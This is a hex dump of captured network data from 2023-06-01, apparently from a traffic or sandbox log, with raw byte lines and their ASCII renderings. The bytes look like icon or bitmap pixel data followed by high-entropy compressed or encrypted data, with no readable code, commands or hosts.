                                                        2023-06-01 10:14:14 UTC86INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        2023-06-01 10:14:14 UTC94INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        2023-06-01 10:14:14 UTC101INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        2023-06-01 10:14:14 UTC109INData Raw: ff 8e 90 75 ff 8f 94 7d ff 80 8c 71 ff 65 7c 53 ff 63 7d 52 ff 47 75 33 ff 32 71 20 ff 33 6e 1b ff 37 6e 19 ff 3a 6f 1a ff 36 6e 16 ff 35 6e 14 ff 3c 6f 17 ff 3a 6f 12 ff 3b 70 0e ff 3e 71 0c ff 44 74 0d ff 4a 74 0d ff 52 76 0f ff 56 76 10 ff 5c 74 10 ff 64 76 10 ff 6e 76 0f ff 78 75 0f ff 83 76 0f ff 8e 75 0e ff 9a 74 0d ff a8 73 0d ff b5 74 0d ff c0 73 0b ff c9 72 0b ff cc 72 0b ff ca 70 0a ff c6 70 0a ff c1 6d 0a ff bc 6b 0a ff b7 67 0a ff b1 64 09 ff ac 61 09 ff a6 5e 09 ff a0 5a 09 ff 9a 57 09 ff 94 53 08 ff 8d 50 08 ff 88 4d 07 ff 8a 52 0f ff 95 5f 1f ff 99 65 28 ff 84 52 17 ff 62 30 00 ff 26 16 06 71 01 02 04 11 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 03 0e 20 14 06 5c 93 58
                                                        Data Ascii: u}qe|Sc}RGu32q 3n7n:o6n5n<o:o;p>qDtJtRvVv\tdvnvxuvutstsrrppmkgda^ZWSPMR_e(Rb0&q \X
                                                        2023-06-01 10:14:14 UTC117INData Raw: ff b8 87 b0 ff ac 86 a4 ff a8 6b 9b ff 93 91 94 ff 85 7e 85 ff 79 79 7a ff 8c 86 8e ff 71 67 71 ff 95 94 98 ff cb d0 d3 ff c8 cc d0 ff c8 cc d0 ff c9 cf d4 ff 9b 96 86 ff 96 70 38 ff 9b 77 42 ff ad 8e 63 ff 9f 83 5b ff 7e 65 44 ff 61 71 49 ff 42 63 43 ff 2b 29 2b ff 6c 55 36 ff 90 7b 5c ff 8e 86 7a ff 79 74 73 ff 7f 76 76 ff 8e 82 79 ff 9b 89 72 ff 73 6a 66 ff 54 49 3c ff 69 52 30 ff 8a 90 8e ff cb cf d4 ff c8 cc d0 ff cc cf d3 ff cd d0 d3 ff cc d0 d3 ff dc dd de ff b7 b5 b2 ff 82 7c 79 ff 66 63 67 ff 97 8b 7b ff b0 8d 5c ff c2 aa 85 ff d7 d8 da ff cb cf d3 ff cd d0 d4 ff cc d1 d6 ff ba b4 af ff 7c 48 1b ff 7a 41 0f ff 7b 42 11 ff 7c 42 11 ff 7c 43 12 ff 7a 43 12 ff 76 41 12 ff 73 40 11 ff 78 48 1b ff 86 56 2c ff 86 59 2f ff 61 35 11 ff 32 13 02 c1 06 05
                                                        Data Ascii: k~yyzqgqp8wBc[~eDaqIBcC+)+lU6{\zytsvvyrsjfTI<iR0|yfcg{\|HzA{B|B|CzCvAs@xHV,Y/a52
                                                        2023-06-01 10:14:14 UTC125INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 24 24 24 48 8a 8a 8a cd c7 c7 c7 ff d1 d1 d1 ff d3 d3 d3 ff d6 d7 d6 ff db db da ff e0 e0 e0 ff e5 e5 e5 ff e9 e9 e9 ff ef ef ee ff ee ee ee ff 8a 8a 8a ff 32 32 32 ff 2c 2c 2c ff 2a 2a 2a ff 29 29 29 ff 26 26 26 ff 26 26 26 ff 27 27 27 ff 28 28 28 ff 27 27 27 ff 22 22 22 ff 53 55 56 ff cc d0 d5 ff ce d2 d4 ff 68 76 a7 ff 21 3a 96 ff 86 b7 e3 ff 4d 7f a5 ff 7e ac d5 ff 1b 32 84 ff 61 73 9d ff cf d2 d4 ff ce d2 d8 ff 88 8a 8e ff 23 23 22 ff 2b 2b 2b ff 29 29 29 ff 2a 2a 2a ff 29 29 29 ff 23 23 23 ff 8d 90 92 ff ce d2 d7 ff c7 cd d1 ff 3a 4c 8f ff 55 59 9a ff b5 be c5 ff 51 83 a5 ff 68 90 c7 ff 0b 1c 7c ff 93 9f b8 ff ce d1 d4 ff c5 c9 ce ff 4a 4b 4c ff 1c 1c 1c ff 21 21 21 ff 21 21
                                                        Data Ascii: $$$H222,,,***)))&&&&&&'''((('''"""SUVhv!:M~2as##"+++)))***)))###:LUYQh|JKL!!!!!
                                                        2023-06-01 10:14:14 UTC133INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        2023-06-01 10:14:14 UTC140INData Raw: ff e6 94 2f ff cd 8c 28 ff bb 94 3d ff bc 94 3b ff bc 95 3b ff bc 97 3b ff bd 98 3b ff bc 93 2e ff bc 92 27 ff bb 8f 21 ff ba 94 25 ff bd 8e 21 ff c1 8e 2f ff bb 8e 18 ff b9 8e 15 ff b9 8e 15 ff b8 8f 15 ff b8 8e 13 ff b8 8f 14 ff b7 8e 13 ff b4 8d 12 ff b4 8d 11 ff b4 8d 11 ff b4 8c 11 ff b3 8b 10 ff b1 8a 0e ff b0 89 0f ff ae 88 0d ff ad 87 0c ff ad 86 0b ff af 85 0d ff b5 86 13 ff c4 89 21 ff d4 8e 2d ff d9 92 33 ff d7 91 33 ff c8 88 25 ff b2 7e 10 ff ac 7c 0a ff ae 7d 0b ff ac 7a 0a ff ab 79 09 ff b2 77 0a ff c4 74 09 ff c3 70 08 ff ba 6b 08 ff b1 66 08 ff a7 60 08 ff 9e 5b 07 ff 95 56 07 ff 8f 54 09 ff 98 60 19 ff a0 6a 26 ff 80 4c 0f ff 42 22 03 ba 03 04 05 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 03 05 1f 5e 37 08 b5 ba 75
                                                        Data Ascii: /(=;;;;.'!%!/!-33%~|}zywtpkf`[VT`j&LB"^7u
                                                        2023-06-01 10:14:14 UTC148INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 07 02 40 7b 4c 26 f4 ae 75 47 ff ab 6e 42 ff a7 69 3c ff a6 68 3a ff a6 67 39 ff a7 68 39 ff bc af a6 ff c5 cc cc ff ab 8e a6 ff 8d 76 88 ff 81 6a 7d ff 46 3d 45 ff 16 17 16 ff 1b 1c 1b ff 1c 1b 1b ff 1e 1e 1e ff 20 20 1f ff 21 21 20 ff 23 23 23 ff 24 24 24 ff 26 25 25 ff 27 27 27 ff 28 28 28 ff 2a 2a 2a ff 29 29 29 ff 2b 2b 2b ff 29 29 29 ff 29 29 29 ff 2a 29 29 ff 29 28 28 ff 29 29 29 ff 27 27 27 ff 28 28 28 ff 27 27 27 ff 25 25 25 ff 24 24 23 ff 23 23 23 ff 24 24 24 ff 21 21 21 ff 21 21 21 ff 1f 1f 1f ff 1f 1f 1f ff 1d 1d 1d ff 1c 1c 1c ff 1b 1b 1a ff 1a 1a 1b ff 19 1b 1d ff 16 1a 1c ff 4d 2f 19 ff 6e 3b 15 ff 6c 3c 1a ff 7e 50
                                                        Data Ascii: @{L&uGnBi<h:g9h9vj}F=E !! ###$$$&%%'''(((***)))+++))))))*)))(()))'''((('''%%%$$####$$$!!!!!!M/n;l<~P
                                                        2023-06-01 10:14:14 UTC156INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        2023-06-01 10:14:14 UTC164INData Raw: ff c1 81 30 ff bf 7d 28 ff c3 a8 86 ff cd d0 d6 ff b6 ab b6 ff ac 95 a9 ff b5 9a b2 ff a5 92 a2 ff 89 7d 88 ff 94 84 98 ff c9 af 87 ff db a8 5d ff b3 a4 88 ff 69 6d 6c ff 21 28 2c ff 24 29 2c ff 26 2b 2e ff 26 2c 2e ff 27 2c 2f ff 27 2b 2f ff 26 2c 2e ff 25 2a 2d ff 24 29 2c ff 21 27 2a ff 27 2d 30 ff 6b 77 80 ff ca ce d3 ff c8 cc d1 ff c8 cb d0 ff d4 d6 d8 ff c4 c3 c4 ff af ae ad ff 9a 9d a0 ff ab b0 b7 ff d0 d3 d6 ff c8 cc d0 ff ca d0 d7 ff a5 7b 50 ff 93 4c 05 ff 90 4e 0a ff 89 4b 0a ff 82 47 0a ff 7b 43 09 ff 77 42 0c ff 84 52 20 ff 81 52 22 ff 49 22 04 e0 0b 07 04 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 07 03 2f 83 51 1a e6 bf 84 3c ff be 81 38 ff ba 7d 30 ff bb 7d 2f ff bd 7d
                                                        Data Ascii: 0}(}]iml!(,$),&+.&,.',/'+/&,.%*-$),!'*'-0kw{PLNKG{CwBR R"I"(/Q<8}0}/}
                                                        2023-06-01 10:14:14 UTC172INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        2023-06-01 10:14:14 UTC179INData Raw: ff 1d 1d 1d ff 1a 1a 1a ff 19 19 19 ff 17 1b 1d ff 24 20 1d ff 65 37 16 ff 72 42 20 ff 7c 50 2f ff 32 17 08 b6 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 60 39 1f c8 b0 73 48 ff a3 68 3d ff 7d 50 30 ff 78 55 3e ff 80 7e 7f ff 68 66 69 ff 4f 4d 4f ff 3f 3e 3f ff 1f 1f 1f ff 23 23 23 ff 24 24 24 ff 27 27 27 ff 2a 2a 2a ff 2b 2b 2b ff 2c 2c 2c ff 2e 2e 2e ff 2d 2d 2d ff 2e 2e 2e ff 2f 2f 2f ff 2e 2e 2e ff 2f 2f 2f ff 2f 2f 2f ff 2d 2d 2d ff 2c 2c 2c ff 2b 2b 2b ff 29 29 29 ff 28 28 28 ff 27 27 27 ff 24 24 24 ff 21 21 21 ff 1e 1f 21 ff 3d 2a 1d ff 6d 39 15 ff 74 46 24 ff 75 49 2c ff 23 0e 04 91 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                        Data Ascii: $ e7rB |P/2`9sHh=}P0xU>~hfiOMO?>?###$$$'''***+++,,,...---...///...//////---,,,+++)))((('''$$$!!!!=*m9tF$uI,#
                                                        2023-06-01 10:14:14 UTC187INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff 80 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 80 00 00 01 80 00
                                                        Data Ascii:
                                                        2023-06-01 10:14:14 UTC195INData Raw: b6 73 52 ef f8 55 c6 bb d0 ba ec 86 ae fb 6d ab 3f ae 0a fb 94 81 46 f1 41 2d 87 1f f8 c1 79 58 f6 df 62 86 c9 e4 53 01 96 76 cc d3 c5 b7 5c 47 8c 31 de 82 45 49 06 8f 9a b5 e8 89 6f e7 e8 a4 39 61 43 f3 25 8b 93 fb 8c 14 70 be a3 aa b3 8e 20 f4 6e 30 fd c4 f3 d7 53 61 71 d2 3e 67 ec 74 48 e1 16 2d 9c be 53 9b 34 88 b5 08 d4 b4 9c d1 70 5a ff a2 17 58 81 29 f5 78 f0 36 82 88 d4 95 0c 69 a6 2b 6b b7 82 20 62 68 00 4e 6e 20 87 6f 40 48 eb 1b 9d 72 94 39 df 4d 2f ff 79 f3 c2 ed ca 97 aa 77 99 90 9d f8 78 1d 91 85 a9 7a 77 8c 76 a5 0f f8 fe 26 08 05 e8 5c a3 ec 80 98 fd ad c6 87 72 5a 4e f7 b7 b1 10 0a 6c f2 dd 9b bc 40 de c0 eb 3b 0d 25 86 bb 2b fd c6 9c 5a 54 ee 9d 98 17 4b 4f 25 5d 50 41 b6 d2 04 f4 e6 10 46 6a d3 27 d3 20 9b 87 4f bc 97 d5 80 2f 98 40 15
                                                        Data Ascii: sRUm?FA-yXbSv\G1EIo9aC%p n0Saq>gtH-S4pZX)x6i+k bhNn o@Hr9M/ywxzwv&\rZNl@;%+ZTKO%]PAFj' O/@
                                                        2023-06-01 10:14:14 UTC203INData Raw: a2 99 f1 2c 57 c9 be 8d b3 78 2c 95 27 c0 0c 70 1d b1 d1 df 43 7c ba 30 9d e4 ea 7f 27 4f 29 b4 cc 3c 6a 77 0e dd 44 08 e0 28 d1 d0 08 1b c5 16 90 e4 0b 6b dd 5d 3b 86 be ad 3e 67 e1 32 a8 51 02 ac 0f 69 17 17 7c 92 7d 38 5d 54 62 1b fa 0a f4 c7 0d 5d 18 97 7b 74 82 cb bb d6 35 b7 6f 4c 75 cf 42 28 46 20 e6 05 4a 3c b4 6b 23 92 2c 19 5b da af 21 6f 89 ec 78 e4 ad d3 63 4f 78 cd 71 5e ab 57 93 3b 2b d6 29 78 84 00 e8 9a 75 9d 53 2f ae 01 c5 16 22 0c ac 96 16 83 43 18 8d 6b 4a ed dd 54 56 8d 4f 9e be 85 a0 68 c4 ae cc c5 05 31 03 7c 5d e8 0e 5d e3 32 e3 79 e3 e7 17 77 39 d0 d8 56 60 4f df 2a 7b e2 af 2a ae 60 52 d5 54 0d 52 9a 6d 80 71 3b 5e 99 7f 21 13 d7 bf 43 6d c5 40 d1 cb 81 78 98 b7 fb 3b 29 c3 67 ec a8 5d 5d 56 26 fd a9 51 9b e8 69 a6 46 8d 92 2f 19
                                                        Data Ascii: ,Wx,'pC|0'O)<jwD(k];>g2Qi|}8]Tb]{t5oLuB(F J<k#,[!oxcOxq^W;+)xuS/"CkJTVOh1|]]2yw9V`O*{*`RTRmq;^!Cm@x;)g]]V&QiF/
                                                        2023-06-01 10:14:14 UTC211INData Raw: ef e2 f5 32 27 b2 4b 10 3d b1 4a 92 b2 8c 61 10 43 58 2e 7a b1 e8 a3 98 15 52 66 02 a2 ea b5 da e2 9b b3 17 f9 b7 50 2d 7e 18 42 fa 21 04 aa 8a 04 be 06 6c b5 19 83 0b c6 73 02 c4 b0 81 08 7e d1 0f 44 d9 74 82 d0 af 6d 21 19 2d 78 db 47 f1 59 2c f9 e1 d3 80 ef 41 a7 58 50 8e 92 8e 00 ad 04 2d 5e cc de 9d 14 38 15 f8 e2 e2 44 e4 07 27 71 aa 20 0a df b9 52 b0 b9 60 df 91 be b3 d3 a4 a4 10 93 ef ac 1c 22 cc bc 09 cc 76 5b ff 61 3b f8 d4 00 70 4a d4 03 65 30 84 e7 08 07 ba dd b8 e1 94 54 e0 4f d0 1f 26 8d 47 fb aa 27 a1 40 bc 4c f9 ac 64 a7 98 34 25 e5 11 b2 37 69 7d 50 95 25 2c 95 8f 42 cd 6a 68 d4 10 18 67 70 fd c3 ae 61 0b f4 a5 3d 72 22 19 bc 67 6b fc d5 b4 86 10 22 54 ee ac ba 8c 21 18 f7 9c 78 e5 75 2f f0 3f 41 a5 45 13 5e cf 9a ec 14 5f db 57 83 80 6a
                                                        Data Ascii: 2'K=JaCX.zRfP-~B!ls~Dtm!-xGY,AXP-^8D'q R`"v[a;pJe0TO&G'@Ld4%7i}P%,Bjhgpa=r"gk"T!xu/?AE^_Wj
                                                        2023-06-01 10:14:14 UTC219INData Raw: 5a 4c 86 19 0f 33 46 dc 4d e4 ce ef 88 b7 0f 5b 34 81 f3 7e 4b ed 9b 57 ef 10 71 7d c0 fb 4f c3 4b cb 19 77 84 ed be 5f 41 00 8e 1a 23 ad ef 49 d2 4d a2 97 1c aa a3 e3 d6 4a f8 aa c9 bd aa 31 ea 62 34 1f 8e ad 1b d6 fa 58 00 73 f5 51 f9 fd 0e 60 99 0f aa bb 9b fc f4 a1 38 57 b2 84 3b e9 a6 7b 1f 3c 50 f5 33 31 3e 1c 0b da 10 52 c9 5d 05 4b ca ae 03 7d 0b 93 4f 02 00 3e 34 b1 66 4b c0 7d 52 27 a0 6a 82 c9 80 27 bf 65 9b c8 3c 3a 91 87 eb 83 5b fa 4f 0f 1f 3a d7 31 57 c3 8d 75 bd 27 91 99 ee b1 f7 8b e3 3f a9 e4 53 f0 a9 29 fb 74 35 91 96 01 12 03 f7 b4 7e 62 f8 2b 7a b2 ed 56 de aa ca 5a 65 cc 78 9b ec f9 8b 21 da cb 5f 67 3a aa ed 68 92 9a 33 19 a8 82 49 2a bd 36 97 c6 b0 a7 03 9a f8 7f b1 2e 14 4d 32 4d f5 5e b3 a3 94 f6 7b b8 3e 16 46 88 5d 93 de 95 b2
                                                        Data Ascii: ZL3FM[4~KWq}OKw_A#IMJ1b4XsQ`8W;{<P31>R]K}O>4fK}R'j'e<:[O:1Wu'?S)t5~b+zVZex!_g:h3I*6.M2M^{>F]
                                                        2023-06-01 10:14:14 UTC226INData Raw: 3b 6c 56 25 fa 57 a0 9e f4 f0 2c 59 c5 74 2b 17 93 07 c4 fa d1 70 99 1a 59 2c 0d b3 29 81 37 d5 f5 79 51 38 8e 55 c7 20 79 ac cb e5 67 40 93 f1 7a 99 5d 5c dc b4 88 51 56 82 f6 f3 d6 ab 17 44 49 cb e4 ee 0b 1e fa 92 c1 33 38 77 75 a9 37 96 c8 a5 65 dd 21 76 d4 5f a9 22 9a e1 c9 4f 08 5e 75 e7 86 e8 4e 2c fd a3 a0 73 7d 8b 94 f4 8d 9b ad 15 07 c2 39 c3 77 0f b5 1a e2 b9 10 f3 68 76 be d5 de c5 a7 55 3b 11 37 24 37 cb 23 2a 20 5b 7b ef 2d 61 1c 9b 63 c9 27 b2 c0 94 c1 62 8d 22 93 47 25 0c 54 1b 6c fd 05 41 6d 14 6d 96 6d 95 6b 1b 92 9c d3 d1 a6 90 8a b5 c1 3f 05 88 89 93 e5 9b aa 49 1d d5 66 36 0a 80 e7 3a 32 b5 ee 59 5a ce 63 89 bf e6 26 26 f6 c6 2a 70 44 dd c1 ba 5d 72 08 b5 54 23 ba d9 b2 bf d6 fb a7 a8 ac 0b 31 59 d2 65 c6 d9 6d 69 31 16 82 e1 c3 26 ec
                                                        Data Ascii: ;lV%W,Yt+pY,)7yQ8U yg@z]\QVDI38wu7e!v_"O^uN,s}9whvU;7$7#* [{-ac'b"G%TlAmmmk?If6:2YZc&&*pD]rT#1Yemi1&
                                                        2023-06-01 10:14:14 UTC234INData Raw: e0 fb 87 c0 49 dc 32 fc 9d 3a 56 f5 c3 30 0a ad fc da 23 b7 34 53 90 4f 23 57 66 69 e8 14 af d3 44 f1 7d 99 7e 61 85 5f 82 03 3e b7 de c0 43 70 52 76 e9 a6 93 f8 69 48 c8 b9 ea 6e 16 a7 cd ca 82 af 13 28 fa 7b c0 f2 5e 7a 9e 0d 9d e3 17 e5 32 cf 1e 82 45 5e 4d 3d 1a 56 95 4a c0 52 e2 10 51 c4 5a 5a 35 d4 71 84 62 d9 13 b6 b2 dd ef c2 4c df 98 e1 8c c7 22 f7 e1 05 83 71 fa 8e ef 71 49 5f 48 e4 65 3c 12 ab a4 0d 33 83 e9 7b 76 0d be 14 3b ba 3e 33 1a ed 27 07 83 ea 2e ee 16 e9 bb d8 e9 ed 9a bc 65 0c ee 96 06 a7 46 16 b1 a4 ff cf 71 28 f0 3e 7b 9f 62 fd 8c 51 c6 70 51 0c 59 61 4a b3 2a b0 df 85 11 87 6e db 9f db 4c 28 fc fc d2 4d 3d 47 a9 d9 b3 f7 0c 1a 0c 1c 9c 94 67 00 69 9f 21 be c9 b6 b2 7c 6e 13 18 95 4c 26 e8 3f 8e 63 d2 c9 fa 0e de 45 9c e8 24 1b 3c
                                                        Data Ascii: I2:V0#4SO#WfiD}~a_>CpRviHn({^z2E^M=VJRQZZ5qbL"qqI_He<3{v;>3'.eFq(>{bQpQYaJ*nL(M=Ggi!|nL&?cE$<
                                                        2023-06-01 10:14:14 UTC242INData Raw: 7b d9 8a f1 a3 e6 7e f8 77 0e 79 87 74 3e 65 8d 44 bc 6b 7e 50 a6 4d ac ae b6 d6 4c 64 86 36 c8 29 de 7e de 3f 93 ac 46 83 ff 79 89 cb 9e cf 70 c5 7e f8 94 4a 01 59 b6 9c e8 cc b8 98 58 b7 3c 86 c5 b4 60 af 02 fa a6 6f b0 48 d4 d9 9a c5 16 30 e1 90 08 1e 15 f5 f5 9c c6 0e f6 7a 9a df f2 21 dc af ad 28 45 31 f8 a1 35 3a f4 be 63 e6 bc 84 4f d3 36 9c c4 19 d6 ea f9 90 c5 df 4c 80 75 8c f1 66 0c 58 64 d8 77 18 ff 33 60 07 d9 3c a2 2c 56 18 f1 a6 a1 b7 77 b5 f5 d7 3d 83 30 8a 04 f4 63 d7 5d bb cf 9d 4b 81 30 53 8c 52 d8 96 99 90 cb d3 97 3e 6b eb 82 ee b7 3d 12 50 b8 d2 38 4a 98 b7 e7 d4 a9 e0 7e 99 f7 f2 36 2e 2d 5c 1a f7 0c f7 ed c2 46 e4 fa 55 01 dd b2 ae e3 6b 19 46 67 3d 81 ca bb 7d ed 79 0c b2 69 d7 c1 0c 19 14 10 af ea 14 5c 34 5c ff 6f 08 ff 33 00 6e
                                                        Data Ascii: {~wyt>eDk~PMLd6)~?Fyp~JYX<`oH0z!(E15:cO6LufXdw3`<,Vw=0c]K0SR>k=P8J~6.-\FUkFg=}yi\4\o3n
                                                        2023-06-01 10:14:14 UTC250INData Raw: f8 fc c3 29 08 48 ec 83 78 9d 4d 5f 44 8e d1 c6 a3 2a 5f ca 58 d7 d8 bf 3e 87 10 d3 b2 53 b0 45 0c fd a5 6d 13 2c c7 52 b6 43 18 31 2d 1f f2 e9 33 26 ce 57 9a a6 58 4a 63 a9 73 bd 9c b9 a2 38 25 d3 43 ed 34 9f 4d 6f e5 53 4a 28 9c ff 37 07 c6 c1 26 9b e7 74 6b a8 b8 a4 6a e1 2c ee 61 16 76 1d 81 82 2b 11 d4 d9 7f 00 40 c4 23 d1 c3 d2 f6 02 e5 b8 11 8a 2d 7c 69 82 bd 33 17 7d e0 eb ca 1a f2 0f 82 81 79 d0 af 23 4b 7b d0 9d 14 87 c3 b9 85 ad b3 b5 5e 57 2a 10 f9 6f 08 02 f6 5c 99 5b 2e 47 3d b3 12 4a fc c8 ab 32 02 be 14 a2 26 66 e7 8c 27 8c 7a 1a df 83 4f f6 b8 be ed d6 be 2e bf 9c b7 9e c4 75 dc 19 14 69 3b 67 c4 99 97 09 91 b8 16 5b 79 c1 da 31 bd 0c ec dc 0e 91 e1 64 e5 23 65 71 b2 3a f4 0d d9 ea 2e e4 7d b8 d7 27 0e 11 b4 bf 76 fc 6a bb 9f 8e 15 eb aa
                                                        Data Ascii: )HxM_D*_X>SEm,RC1-3&WXJcs8%C4MoSJ(7&tkj,av+@#-|i3}y#K{^W*o\[.G=J2&f'zO.ui;g[y1d#eq:.}'vj
